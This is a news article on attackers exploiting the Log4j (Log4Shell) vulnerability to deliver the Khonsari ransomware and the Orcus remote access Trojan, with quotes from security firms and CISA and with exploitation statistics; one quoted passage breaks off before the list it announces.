By exploiting the newly exposed severe Log4j vulnerability, Romanian cybersecurity technology company Bitdefender reported on Monday that attempts are being made to target Windows devices with an unique ransomware family called Khonsari as well as a remote access Trojan dubbed Orcus.
The attack takes use of the remote code execution (RCE) issue to download an extra payload, a.NET binary, from a remote server, which encrypts any files with the extension “.khonsari” and displays a ransom message urging victims to pay a Bitcoin ransom to regain access to their files.
Sergio Caltagirone, Vice president of threat intelligence at Dragos reported that ,”Log4j is heavily used in external/internet-facing and internal applications that manage and control industrial processes, Many industrial operations like electric power, water, food and beverage, manufacturing, and others are exposed to potential remote exploitation and access. External and internet-facing applications should be prioritised above internal applications because of their internet exposure, even though both are susceptible.”
In addition, CISA has added the Log4j vulnerability to its Known Exploited Vulnerabilities Catalog, giving government agencies until December 24 to apply corrections. Government agencies in Austria, Canada, New Zealand and the United Kingdom have all issued similar warnings in the past.
“Once executed, the malicious file will list all the drives and encrypt them entirely, except the C:\ drive. On the C:\ drive, Khonsari will encrypt only the following folders:
According to Kaspersky telemetry data, the vast majority of exploitation attempts against Log4Shell originated in Russia (4,275), followed by Brazil (2,493), the United States (1,746), Germany (1,336), Mexico (1,177), Italy (1,094), France (1,008), and Iran (1,008).
Check Point researchers warned that 60 new variants of the original Log4j exploit were released in less than 24 hours, blocking over 1,272,000 intrusion attempts, with 46 percent of them staged by known criminal groups. Log4Shell has been branded a “real cyber epidemic” by an Israeli security firm.
Active exploitation attempts in the wild have so far entailed using the bug to hook devices into a botnet and deliver additional payloads like Cobalt Strike and bitcoin miners. Sophos, a cybersecurity firm, claimed it saw attempts to steal Amazon Web Services (AWS) keys and other confidential information from infected servers.
Finally CISA Director Jen Easterly concluded that “To be clear, this vulnerability poses a grave risk.” “Given its widespread use, this vulnerability, which is being widely exploited by an increasing number of threat actors, poses an important challenge to network defenders. Vendors should also communicate with their consumers to ensure that end users are aware of the vulnerability and that software upgrades are prioritised.”